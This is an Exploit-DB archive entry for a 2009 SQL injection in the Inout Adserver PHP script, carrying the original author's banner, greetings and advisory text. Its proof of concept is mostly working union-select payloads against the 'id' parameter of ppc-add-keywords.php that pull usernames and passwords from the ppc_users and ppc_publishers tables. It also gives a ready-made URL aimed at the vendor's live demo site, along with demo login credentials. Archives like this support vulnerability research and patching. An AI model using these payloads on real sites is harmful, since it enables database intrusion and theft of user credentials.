Inout Adserver - 'id' SQL Injection

EDB-ID:

9271

CVE:

2009-3223

EDB Verified:

Author:

boom3rang

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2009-07-27

Vulnerable App: 
# Inout Adserver (id) Remote SQL injection                         [_][-][X]
      _  ___  _  ___      ___ ___ _____      __  ___ __   __  ___       
     | |/ / || |/ __|___ / __| _ \ __\ \    / / |_  )  \ /  \/ _ \      
     | ' <| __ | (_ |___| (__|   / _| \ \/\/ /   / / () | () \_, /      
     |_|\_\_||_|\___|    \___|_|_\___| \_/\_/   /___\__/ \__/ /_/       
                                                                          
                                                                        
      Red n'black i dress eagle on my chest.
      It's good to be an ALBANIAN Keep my head up high for that flag i die.
      Im proud to be an ALBANIAN
   ########################################################################   

       Author             : boom3rang                              
       Contact            : boom3rang[at]live.com                         
       Greetz             : H!tm@N - KHG - cHs

                  R.I.P redc00de                 
   ------------------------------------------------------------------------

                  Affected software description    	                  
       Software 	: Inout Adserver            	                          
       Vendor		: http://www.inoutscripts.com/products/adserver/	           
       Price 	      	: Just $99.95          
       Version Vuln.   : /		
 
   ------------------------------------------------------------------------

                 Proof Of Concept!
               --------------------

= NOTE!! =
########################################################################################
First you need to create an Advertiser account to the site, it's free, then you need "login" to execute this exploit!
########################################################################################

Dork: N/W
---------------------------------------------------------------------------------------
SQLi:
http://localhost/PATH/ppc-add-keywords.php?id= [ Exploit ]
---------------------------------------------------------------------------------------
Exploit: 
   1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--

   1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_publishers--
---------------------------------------------------------------------------------------

Example:
http://localhost/PATH/ppc-add-keywords.php?id=1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--

---------------------------------------------------------------------------------------

LiveDemo:

Advertiser Demo Login!   
Username : advertiser
Password : advertiser 

http://www.inoutscripts.com/demo/inout_adserver/ppc-add-keywords.php?id=348+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--

# milw0rm.com [2009-07-27]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services